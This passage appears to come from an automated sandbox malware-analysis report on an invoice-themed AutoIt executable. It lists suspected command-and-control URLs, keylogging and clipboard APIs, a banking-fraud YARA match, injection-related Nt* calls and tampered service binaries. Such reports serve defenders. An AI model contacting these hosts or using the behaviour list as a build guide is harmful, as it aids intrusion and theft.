00000000.00000003.1296799474.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285623478.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/wtafuencqgdxd
Source: INV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/wtafuencqgdxds
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ssbzmoy.biz/SgL
Source: elevation_service.exe.0.dr | String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: elevation_service.exe.0.dr | String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

          E-Banking Fraud

          Source: Yara match | File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00403B3A This is a third-party compiled AutoIt script.
          Source: INV_NE_02_2034388.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_653b9630-7
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_2b41795b-b
          Source: INV_NE_02_2034388.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_3a1e9cf1-a
          Source: INV_NE_02_2034388.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9992aa7a-d
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0042CBC3 NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C735C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C74340 NtSetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C74650 NtSuspendThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72BE0 NtQueryValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72BF0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72AD0 NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72FE0 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72F30 NtCreateSection
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72EA0 NtAdjustPrivilegesToken
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72DD0 NtDelayExecution
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72D10 NtMapViewOfSection
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72CA0 NtQueryInformationToken
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72C60 NtCreateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72C70 NtFreeVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C72C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C73090 NtSetValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C73010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C739B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C73D70 NtOpenThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C73D10 NtOpenProcessToken
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
          Source: C:\Windows\System32\AppVClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\7c03ee2ee2c8fb2a.bin
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0040E6A0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0042D975
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0040FCE0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004221C5
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004362D2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004803DA
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0043242E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004225FA
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0045E616
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004166E1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0043878F
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00436844
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00480857
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00418808
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00468889
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0042CB21
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00526CC8
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00436DB6
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00416F9E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00413030
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0042F1D9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00423187
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00401287
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00421484
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00415520
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00427696
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00415760
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00421978
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00439AB5
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00487DDB
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00421D90
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0042BDA6
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0040DF00
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00413FE0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00BC00D9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00B86EAF
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00B851EE
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00BBD580
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00BB3780
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00BBC7F0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00BC39A3
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00BB5980
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00B87B71
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00B87F80
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00E9F280
          Source: C:\Windows\System32\AppVClient.exe | Code function: 12_2_0055A810
          Source: C:\Windows\System32\AppVClient.exe | Code function: 12_2_00537C00
          Source: C:\Windows\System32\AppVClient.exe | Code function: 12_2_00562D40
          Source: C:\Windows\System32\AppVClient.exe | Code function: 12_2_005379F0
          Source: C:\Windows\System32\AppVClient.exe | Code function: 12_2_0055EEB0
          Source: C:\Windows\System32\AppVClient.exe | Code function: 12_2_005592A0
          Source: C:\Windows\System32\AppVClient.exe | Code function: 12_2_005593B0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 16_2_009BA810
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 16_2_009979F0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 16_2_009B92A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 16_2_009B93B0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 16_2_00997C00
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 16_2_009C2D40
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 16_2_009BEEB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0040E855
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_004010C8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_004010D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0042F1D3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_004029F8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_00402A00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_004032D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0041040A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_00410413
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_00401500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_00416DA3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0040E643
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_00410633
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_004026F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0040E788
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0040E793
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03D003E6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFA352
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CC02C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF81CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF41A2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03D001AA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CC8158
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C30100
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3C7C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C64750
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5C6E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03D00591
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CEE4F6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF2446
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CE4420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF6BD7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFAB40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03D0A9A6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6E8F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C268B8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C4A840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C42840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C32FC8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C4CFE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CBEFA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CB4F40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C82F28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C60F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CE2F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFEEDB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C52E90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFCE93
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C40E59
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFEE26
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3ADE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C58DBF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C4AD00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CDCD1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C30CF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CE0CB5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C40C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C8739A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C2D34C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF132D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5B2C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CE12ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C452A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C4B1B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C7516C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C2F172
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03D0B16B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CEF0CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C470C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF70E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFF0E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFF7B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF16CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C85630
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03D095C3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CDD5B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF7571
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C31460
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFF43F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CB5BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C7DBF9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5FB80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFFB76
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CEDAC6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CDDAAC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C85AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CE1AA3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFFA49
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF7A46
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CB3A6C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C49950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5B950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CD5910
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C438E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAD800
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C03FD2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C03FD5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C41F92
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFFFB1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFFF09
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C49EB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5FDC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C43D40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF1D5A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF7D73
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFFCF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CB9C32
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 18_2_015D2D40
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 18_2_015A79F0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 18_2_015CA810
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 18_2_015A7C00
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 18_2_015C93B0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 18_2_015CEEB0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 18_2_015C92A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: String function: 00407DE1 appears 35 times
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: String function: 00428900 appears 41 times
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: String function: 00420AE3 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 277 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 111 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 105 times
          Source: elevation_service.exe0.0.dr | Static PE information: Number of sections : 12 > 10
          Source: elevation_service.exe.0.dr | Static PE information: Number of sections : 12 > 10
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1323479271.00000000041E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemaintenanceservice.exe0 vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1324696202.0000000004E2D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1284308466.0000000004140000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1325665290.0000000004C83000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1257110532.0000000003F20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeN vs INV_NE_02_2034388.exe
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1262204155.0000000003F20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameALG.exej% vs INV_NE_02_2034388.exe
          Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
          Source: INV_NE_02_2034388.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: INV_NE_02_2034388.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: maintenanceservice.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msdtc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
